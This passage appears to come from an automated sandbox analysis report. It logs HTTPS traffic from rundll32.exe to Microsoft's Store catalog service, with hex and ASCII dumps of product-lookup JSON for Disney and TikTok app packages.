                                                                                                                                                                                    2023-01-05 07:59:10 UTC15264INData Raw: 7b 5c 22 61 67 65 52 61 74 69 6e 67 5c 22 3a 33 2c 5c 22 6f 70 74 4f 75 74 2e 44 56 52 5c 22 3a 74 72 75 65 2c 5c 22 74 68 69 72 64 50 61 72 74 79 41 70 70 52 61 74 69 6e 67 73 5c 22 3a 5b 7b 5c 22 6c 65 76 65 6c 5c 22 3a 39 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 33 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 38 31 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 35 31 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 32 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 32 39 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 39 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 38 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 36 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 32 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22
                                                                                                                                                                                    Data Ascii: {\"ageRating\":3,\"optOut.DVR\":true,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"level\":81,\"systemId\":5},{\"level\":51,\"systemId\":12},{\"level\":29,\"systemId\":9},{\"level\":78,\"systemId\":16},{\"level\":72,\"systemId\":15},{\"level\"
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15265INData Raw: 39 2d 33 38 66 36 32 34 64 36 34 33 33 35 2d 58 38 36 22 2c 22 50 61 63 6b 61 67 65 52 61 6e 6b 22 3a 33 30 30 31 31 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 69 65 73 22 3a 5b 7b 22 4d 61 78 54 65 73 74 65 64 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 58 62 6f 78 22 7d 5d 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 79 58 6d 6c 42 6c 6f 62 22 3a 22 7b 5c 22 62 6c 6f 62 2e 76 65 72 73 69 6f 6e 5c 22 3a 31 36 38 38 38 36 37 30 34 30 35 32 36 33 33 36 2c 5c 22 63 6f 6e 74 65 6e 74 2e 69 73 4d 61 69 6e 5c 22 3a 66 61 6c 73 65 2c 5c 22 63 6f 6e 74 65 6e 74 2e
                                                                                                                                                                                    Data Ascii: 9-38f624d64335-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814751014977536,"MinVersion":2814751014977536,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15266INData Raw: 7b 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 58 51 58 58 4c 46 53 54 38 39 22 2c 22 57 75 42 75 6e 64 6c 65 49 64 22 3a 22 36 62 65 37 31 66 36 31 2d 36 35 64 64 2d 34 37 32 31 2d 61 61 62 65 2d 38 63 34 36 34 36 37 33 37 33 32 37 22 2c 22 57 75 43 61 74 65 67 6f 72 79 49 64 22 3a 22 32 32 65 30 63 65 37 66 2d 34 32 37 61 2d 34 30 66 61 2d 62 66 61 36 2d 30 64 65 37 62 38 35 35 34 38 34 30 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 44 69 73 6e 65 79 2e 33 37 38 35 33 46 43 32 32 42 32 43 45 5f 36 72 61 72 66 39 73 61 34 76 38 6a 74 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 31 22 2c 22 43 6f 6e 74 65 6e 74 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 65 61 74 75 72 65 73 22 3a 6e 75 6c 6c 7d 7d 5d 2c 22 42 75 6e 64 6c 65 64
                                                                                                                                                                                    Data Ascii: {"ProductId":"9NXQXXLFST89","WuBundleId":"6be71f61-65dd-4721-aabe-8c4646737327","WuCategoryId":"22e0ce7f-427a-40fa-bfa6-0de7b8554840","PackageFamilyName":"Disney.37853FC22B2CE_6rarf9sa4v8jt","SkuId":"0011","Content":null,"PackageFeatures":null}}],"Bundled
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15267INData Raw: 22 55 53 22 5d 2c 22 4f 72 64 65 72 4d 61 6e 61 67 65 6d 65 6e 74 44 61 74 61 22 3a 7b 22 47 72 61 6e 74 65 64 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 5d 2c 22 50 72 69 63 65 22 3a 7b 22 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 49 73 50 49 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 2c 22 4c 69 73 74 50 72 69 63 65 22 3a 30 2e 30 2c 22 4d 53 52 50 22 3a 30 2e 30 2c 22 54 61 78 54 79 70 65 22 3a 22 22 2c 22 57 68 6f 6c 65 73 61 6c 65 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 22 7d 7d 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 7d 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 31 22 2c 22 44 69 73 70 6c 61 79 52 61 6e 6b 22 3a 30 2c 22 52 65 6d 65 64 69 61 74 69 6f 6e 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 7d 2c 7b 22
                                                                                                                                                                                    Data Ascii: "US"],"OrderManagementData":{"GrantedEntitlementKeys":[],"Price":{"CurrencyCode":"USD","IsPIRequired":false,"ListPrice":0.0,"MSRP":0.0,"TaxType":"","WholesaleCurrencyCode":""}},"Properties":{},"SkuId":"0011","DisplayRank":0,"RemediationRequired":false},{"
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15268INData Raw: 22 3a 66 61 6c 73 65 2c 22 4c 69 73 74 50 72 69 63 65 22 3a 30 2e 30 2c 22 4d 53 52 50 22 3a 30 2e 30 2c 22 54 61 78 54 79 70 65 22 3a 22 22 2c 22 57 68 6f 6c 65 73 61 6c 65 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 22 7d 7d 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 7d 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 31 22 2c 22 44 69 73 70 6c 61 79 52 61 6e 6b 22 3a 31 2c 22 52 65 6d 65 64 69 61 74 69 6f 6e 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 7d 5d 7d 5d 7d 5d 2c 22 54 6f 74 61 6c 52 65 73 75 6c 74 43 6f 75 6e 74 22 3a 31 7d
                                                                                                                                                                                    Data Ascii: ":false,"ListPrice":0.0,"MSRP":0.0,"TaxType":"","WholesaleCurrencyCode":""}},"Properties":{},"SkuId":"0011","DisplayRank":1,"RemediationRequired":false}]}]}],"TotalResultCount":1}


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    53192.168.2.44989420.82.154.241443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15268OUTGET /v7.0/products/lookup?alternateId=PackageFamilyName&value=BytedancePte.Ltd.TikTok_6yccndn6064se&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                    User-Agent: Install Service
                                                                                                                                                                                    MS-CV: qws4fbTIWU+WpwRN.0.2.4
                                                                                                                                                                                    Host: displaycatalog.mp.microsoft.com
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15268INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Length: 44807
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:59:10 GMT
                                                                                                                                                                                    Server: Kestrel
                                                                                                                                                                                    Vary: Authorization
                                                                                                                                                                                    MS-CorrelationId: cffd7ff6-2345-440b-8c0c-c590ea8c0850
                                                                                                                                                                                    MS-RequestId: bc84d3cd-93e6-490a-8e9f-a3d6a794279f
                                                                                                                                                                                    MS-CV: qws4fbTIWU+WpwRN.0.2.4.4008885050.3760384831.0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    MS-ServerId: b4ddc6-t5t8n
                                                                                                                                                                                    MS-DocumentVersions: 9NH2GPH4JZS4|1113
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15269INData Raw: 7b 22 42 69 67 49 64 73 22 3a 5b 22 39 4e 48 32 47 50 48 34 4a 5a 53 34 22 5d 2c 22 48 61 73 4d 6f 72 65 50 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 50 72 6f 64 75 63 74 73 22 3a 5b 7b 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 32 2d 30 33 2d 30 38 54 32 30 3a 31 31 3a 35 31 2e 33 38 33 38 35 37 30 5a 22 2c 22 4c 6f 63 61 6c 69 7a 65 64 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 7b 22 46 72 61 6e 63 68 69 73 65 73 22 3a 5b 5d 2c 22 49 6d 61 67 65 73 22 3a 5b 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 36 35 30 33 39 34 32 36 39 36 31 31 33 32 33 30 36 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43
                                                                                                                                                                                    Data Ascii: {"BigIds":["9NH2GPH4JZS4"],"HasMorePages":false,"Products":[{"LastModifiedDate":"2022-03-08T20:11:51.3838570Z","LocalizedProperties":[{"Franchises":[],"Images":[{"FileId":"3065039426961132306","EISListingIdentifier":null,"BackgroundColor":"transparent","C
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15272INData Raw: 31 36 2d 61 32 66 66 31 36 30 33 32 61 39 63 22 2c 22 57 69 64 74 68 22 3a 36 36 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 34 39 39 34 35 38 38 38 31 34 34 35 37 37 32 38 34 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 33 35 38 38 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 38 38 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 54 69 6c 65 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36
                                                                                                                                                                                    Data Ascii: 16-a2ff16032a9c","Width":66},{"FileId":"3049945888144577284","EISListingIdentifier":null,"BackgroundColor":"transparent","Caption":"","FileSizeInBytes":3588,"ForegroundColor":"","Height":88,"ImagePositionInfo":"","ImagePurpose":"Tile","UnscaledImageSHA256
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15276INData Raw: 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 33 35 32 31 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 33 30 30 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 54 69 6c 65 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 56 6b 6b 75 57 65 38 45 4f 64 75 46 42 69 75 67 45 45 64 51 6c 61 75 74 36 77 53 52 64 62 34 71 44 47 70 76 74 51 4e 39 71 76 30 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 31 38 37 37 34 2e 31 33 36 33 34 30 35 32 35 39 35 36 31 30 35 31 31 2e 63 34
                                                                                                                                                                                    Data Ascii: :"","FileSizeInBytes":13521,"ForegroundColor":"","Height":300,"ImagePositionInfo":"","ImagePurpose":"Tile","UnscaledImageSHA256Hash":"VkkuWe8EOduFBiugEEdQlaut6wSRdb4qDGpvtQN9qv0=","Uri":"//store-images.s-microsoft.com/image/apps.18774.13634052595610511.c4
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15280INData Raw: 67 20 74 68 65 69 72 20 69 6e 63 72 65 64 69 62 6c 65 20 73 6b 69 6c 6c 73 20 61 6e 64 20 65 76 65 72 79 64 61 79 20 6c 69 66 65 2e 20 4c 65 74 20 79 6f 75 72 73 65 6c 66 20 62 65 20 69 6e 73 70 69 72 65 64 2e 5c 72 5c 6e 5c 72 5c 6e e2 96 a0 20 41 64 64 20 79 6f 75 72 20 66 61 76 6f 72 69 74 65 20 6d 75 73 69 63 20 6f 72 20 73 6f 75 6e 64 20 74 6f 20 79 6f 75 72 20 76 69 64 65 6f 73 20 66 6f 72 20 66 72 65 65 5c 72 5c 6e 45 61 73 69 6c 79 20 65 64 69 74 20 79 6f 75 72 20 76 69 64 65 6f 73 20 77 69 74 68 20 6d 69 6c 6c 69 6f 6e 73 20 6f 66 20 66 72 65 65 20 6d 75 73 69 63 20 63 6c 69 70 73 20 61 6e 64 20 73 6f 75 6e 64 73 2e 20 57 65 20 63 75 72 61 74 65 20 6d 75 73 69 63 20 61 6e 64 20 73 6f 75 6e 64 20 70 6c 61 79 6c 69 73 74 73 20 66 6f 72 20 79 6f 75
                                                                                                                                                                                    Data Ascii: g their incredible skills and everyday life. Let yourself be inspired.\r\n\r\n Add your favorite music or sound to your videos for free\r\nEasily edit your videos with millions of free music clips and sounds. We curate music and sound playlists for you
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15284INData Raw: 20 70 65 72 73 6f 6e 61 6c 69 7a 65 64 20 76 69 64 65 6f 20 66 65 65 64 20 62 61 73 65 64 20 6f 6e 20 77 68 61 74 20 79 6f 75 20 77 61 74 63 68 2c 20 6c 69 6b 65 2c 20 61 6e 64 20 73 68 61 72 65 2e 20 54 69 6b 54 6f 6b 20 6f 66 66 65 72 73 20 79 6f 75 20 72 65 61 6c 2c 20 69 6e 74 65 72 65 73 74 69 6e 67 2c 20 61 6e 64 20 66 75 6e 20 76 69 64 65 6f 73 20 74 68 61 74 20 77 69 6c 6c 20 6d 61 6b 65 20 79 6f 75 72 20 64 61 79 2e 5c 72 5c 6e 20 5c 72 5c 6e e2 96 a0 20 45 78 70 6c 6f 72 65 20 76 69 64 65 6f 73 2c 20 6a 75 73 74 20 6f 6e 65 20 73 63 72 6f 6c 6c 20 61 77 61 79 5c 72 5c 6e 57 61 74 63 68 20 61 6c 6c 20 74 79 70 65 73 20 6f 66 20 76 69 64 65 6f 73 2c 20 66 72 6f 6d 20 43 6f 6d 65 64 79 2c 20 47 61 6d 69 6e 67 2c 20 44 49 59 2c 20 46 6f 6f 64 2c 20
                                                                                                                                                                                    Data Ascii: personalized video feed based on what you watch, like, and share. TikTok offers you real, interesting, and fun videos that will make your day.\r\n \r\n Explore videos, just one scroll away\r\nWatch all types of videos, from Comedy, Gaming, DIY, Food,
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15288INData Raw: 6b 75 70 52 65 73 74 6f 72 65 5c 22 3a 66 61 6c 73 65 2c 5c 22 6f 70 74 4f 75 74 2e 72 65 6d 6f 76 65 61 62 6c 65 4d 65 64 69 61 5c 22 3a 66 61 6c 73 65 7d 2c 5c 22 70 6f 6c 69 63 79 32 5c 22 3a 7b 5c 22 61 67 65 52 61 74 69 6e 67 5c 22 3a 33 2c 5c 22 6f 70 74 4f 75 74 2e 44 56 52 5c 22 3a 66 61 6c 73 65 2c 5c 22 74 68 69 72 64 50 61 72 74 79 41 70 70 52 61 74 69 6e 67 73 5c 22 3a 5b 7b 5c 22 6c 65 76 65 6c 5c 22 3a 39 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 33 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 38 31 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 35 30 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 32 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 32 39 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 39 7d 2c 7b 5c 22 6c 65 76
                                                                                                                                                                                    Data Ascii: kupRestore\":false,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"level\":81,\"systemId\":5},{\"level\":50,\"systemId\":12},{\"level\":29,\"systemId\":9},{\"lev
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15292INData Raw: 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 36 37 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 33 7d 5d 7d 7d 22 2c 22 50 61 63 6b 61 67 65 44 6f 77 6e 6c 6f 61 64 55 72 69 73 22 3a 6e 75 6c 6c 2c 22 46 75 6c 66 69 6c 6c 6d 65 6e 74 44 61 74 61 22 3a 7b 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 48 32 47 50 48 34 4a 5a 53 34 22 2c 22 57 75 42 75 6e 64 6c 65 49 64 22 3a 22 39 63 34 33 66 35 31 38 2d 65 62 64 31 2d 34 62 62 61 2d 61 35 62 38 2d 35 33 30 63 34 38 34 30 61 65 66 66 22 2c 22 57 75 43 61 74 65 67 6f 72 79 49 64 22 3a 22 30 62 62 66 64 34 35 33 2d 36 35 65 66 2d 34 62 38 33 2d 61 37 65 66 2d 39 30 39 38 63 66 35 64 39 38 61 31 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 42 79 74
                                                                                                                                                                                    Data Ascii: \"systemId\":15},{\"level\":67,\"systemId\":13}]}}","PackageDownloadUris":null,"FulfillmentData":{"ProductId":"9NH2GPH4JZS4","WuBundleId":"9c43f518-ebd1-4bba-a5b8-530c4840aeff","WuCategoryId":"0bbfd453-65ef-4b83-a7ef-9098cf5d98a1","PackageFamilyName":"Byt
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15296INData Raw: 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 48 6f 6c 6f 67 72 61 70 68 69 63 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 43 6f 72 65 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 38 38 32 38 30 38 30 22 7d 5d 7d 2c 22 45 6e 64 44 61 74 65 22 3a 22 39 39 39 38 2d 31 32 2d 33 30 54 30 30 3a 30 30 3a 30 30 2e 30 30 30 30 30 30 30 5a 22 2c 22 52 65 73 6f 75 72 63 65 53 65 74 49 64 73 22 3a 5b 22 31 22 5d 2c 22 53 74 61 72 74 44 61 74 65 22 3a 22 31
                                                                                                                                                                                    Data Ascii: mName":"Windows.Holographic"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Core"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.8828080"}]},"EndDate":"9998-12-30T00:00:00.0000000Z","ResourceSetIds":["1"],"StartDate":"1
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15300INData Raw: 20 76 69 72 61 6c 20 6f 72 69 67 69 6e 61 6c 20 73 6f 75 6e 64 73 2e 5c 72 5c 6e 5c 72 5c 6e e2 96 a0 20 45 78 70 72 65 73 73 20 79 6f 75 72 73 65 6c 66 20 77 69 74 68 20 63 72 65 61 74 69 76 65 20 65 66 66 65 63 74 73 5c 72 5c 6e 55 6e 6c 6f 63 6b 20 74 6f 6e 73 20 6f 66 20 66 69 6c 74 65 72 73 2c 20 65 66 66 65 63 74 73 2c 20 61 6e 64 20 41 52 20 6f 62 6a 65 63 74 73 20 74 6f 20 74 61 6b 65 20 79 6f 75 72 20 76 69 64 65 6f 73 20 74 6f 20 74 68 65 20 6e 65 78 74 20 6c 65 76 65 6c 2e 5c 72 5c 6e 5c 72 5c 6e e2 96 a0 20 45 64 69 74 20 79 6f 75 72 20 6f 77 6e 20 76 69 64 65 6f 73 20 5c 72 5c 6e 4f 75 72 20 69 6e 74 65 67 72 61 74 65 64 20 65 64 69 74 69 6e 67 20 74 6f 6f 6c 73 20 61 6c 6c 6f 77 20 79 6f 75 20 74 6f 20 65 61 73 69 6c 79 20 74 72 69 6d 2c 20
                                                                                                                                                                                    Data Ascii: viral original sounds.\r\n\r\n Express yourself with creative effects\r\nUnlock tons of filters, effects, and AR objects to take your videos to the next level.\r\n\r\n Edit your own videos \r\nOur integrated editing tools allow you to easily trim,
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15301INData Raw: 2c 22 42 52 22 2c 22 42 47 22 2c 22 43 41 22 2c 22 43 4c 22 2c 22 43 4e 22 2c 22 43 4f 22 2c 22 43 52 22 2c 22 48 52 22 2c 22 43 59 22 2c 22 43 5a 22 2c 22 44 4b 22 2c 22 45 47 22 2c 22 45 45 22 2c 22 46 49 22 2c 22 46 52 22 2c 22 44 45 22 2c 22 47 52 22 2c 22 47 54 22 2c 22 48 4b 22 2c 22 48 55 22 2c 22 49 53 22 2c 22 49 4e 22 2c 22 49 44 22 2c 22 49 51 22 2c 22 49 45 22 2c 22 49 4c 22 2c 22 49 54 22 2c 22 4a 50 22 2c 22 4a 4f 22 2c 22 4b 5a 22 2c 22 4b 45 22 2c 22 4b 57 22 2c 22 4c 56 22 2c 22 4c 42 22 2c 22 4c 49 22 2c 22 4c 54 22 2c 22 4c 55 22 2c 22 4d 59 22 2c 22 4d 54 22 2c 22 4d 52 22 2c 22 4d 58 22 2c 22 4d 41 22 2c 22 4e 4c 22 2c 22 4e 5a 22 2c 22 4e 47 22 2c 22 4e 4f 22 2c 22 4f 4d 22 2c 22 50 4b 22 2c 22 50 45 22 2c 22 50 48 22 2c 22 50 4c 22
                                                                                                                                                                                    Data Ascii: ,"BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL"
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15302INData Raw: 22 2c 22 4b 4e 22 2c 22 4c 43 22 2c 22 50 4d 22 2c 22 56 43 22 2c 22 54 4a 22 2c 22 54 5a 22 2c 22 54 47 22 2c 22 54 4b 22 2c 22 54 4f 22 2c 22 54 4d 22 2c 22 54 43 22 2c 22 54 56 22 2c 22 55 4d 22 2c 22 55 47 22 2c 22 56 49 22 2c 22 56 47 22 2c 22 57 46 22 2c 22 45 48 22 2c 22 5a 4d 22 2c 22 5a 57 22 2c 22 55 5a 22 2c 22 56 55 22 2c 22 53 52 22 2c 22 53 5a 22 2c 22 41 44 22 2c 22 4d 43 22 2c 22 53 4d 22 2c 22 4d 45 22 2c 22 56 41 22 2c 22 4e 45 55 54 52 41 4c 22 5d 7d 5d 2c 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 48 32 47 50 48 34 4a 5a 53 34 22 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 46 75 6c 66 69 6c 6c 6d 65 6e 74 44 61 74 61 22 3a 7b 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 48 32 47 50 48 34 4a 5a 53 34 22 2c 22 57 75 43 61 74 65 67
                                                                                                                                                                                    Data Ascii: ","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NH2GPH4JZS4","Properties":{"FulfillmentData":{"ProductId":"9NH2GPH4JZS4","WuCateg
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15303INData Raw: 76 65 72 73 61 6c 22 7d 5d 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 79 58 6d 6c 42 6c 6f 62 22 3a 22 7b 5c 22 62 6c 6f 62 2e 76 65 72 73 69 6f 6e 5c 22 3a 31 36 38 38 38 36 37 30 34 30 35 32 36 33 33 36 2c 5c 22 63 6f 6e 74 65 6e 74 2e 62 75 6e 64 6c 65 64 50 61 63 6b 61 67 65 73 5c 22 3a 5b 5c 22 42 79 74 65 64 61 6e 63 65 50 74 65 2e 4c 74 64 2e 54 69 6b 54 6f 6b 5f 31 2e 30 2e 33 2e 30 5f 6e 65 75 74 72 61 6c 5f 5f 36 79 63 63 6e 64 6e 36 30 36 34 73 65 5c 22 5d 2c 5c 22 63 6f 6e 74 65 6e 74 2e 69 73 4d 61 69 6e 5c 22 3a 66 61 6c 73 65 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 61 63 6b 61 67 65 49 64 5c 22 3a 5c 22 42 79 74 65 64 61 6e 63 65 50 74 65 2e 4c 74 64 2e 54 69 6b 54 6f 6b 5f 31 2e 30 2e 33 2e 30 5f 6e 65 75 74 72 61 6c 5f 7e 5f 36
                                                                                                                                                                                    Data Ascii: versal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"BytedancePte.Ltd.TikTok_1.0.3.0_neutral__6yccndn6064se\"],\"content.isMain\":false,\"content.packageId\":\"BytedancePte.Ltd.TikTok_1.0.3.0_neutral_~_6
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15304INData Raw: 2d 65 62 64 31 2d 34 62 62 61 2d 61 35 62 38 2d 35 33 30 63 34 38 34 30 61 65 66 66 22 2c 22 57 75 43 61 74 65 67 6f 72 79 49 64 22 3a 22 30 62 62 66 64 34 35 33 2d 36 35 65 66 2d 34 62 38 33 2d 61 37 65 66 2d 39 30 39 38 63 66 35 64 39 38 61 31 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 42 79 74 65 64 61 6e 63 65 50 74 65 2e 4c 74 64 2e 54 69 6b 54 6f 6b 5f 36 79 63 63 6e 64 6e 36 30 36 34 73 65 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 31 22 2c 22 43 6f 6e 74 65 6e 74 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 65 61 74 75 72 65 73 22 3a 6e 75 6c 6c 7d 7d 2c 7b 22 41 70 70 6c 69 63 61 74 69 6f 6e 73 22 3a 5b 7b 22 41 70 70 6c 69 63 61 74 69 6f 6e 49 64 22 3a 22 41 70 70 22 7d 5d 2c 22 41 72 63 68 69 74 65 63 74 75 72 65 73
                                                                                                                                                                                    Data Ascii: -ebd1-4bba-a5b8-530c4840aeff","WuCategoryId":"0bbfd453-65ef-4b83-a7ef-9098cf5d98a1","PackageFamilyName":"BytedancePte.Ltd.TikTok_6yccndn6064se","SkuId":"0011","Content":null,"PackageFeatures":null}},{"Applications":[{"ApplicationId":"App"}],"Architectures
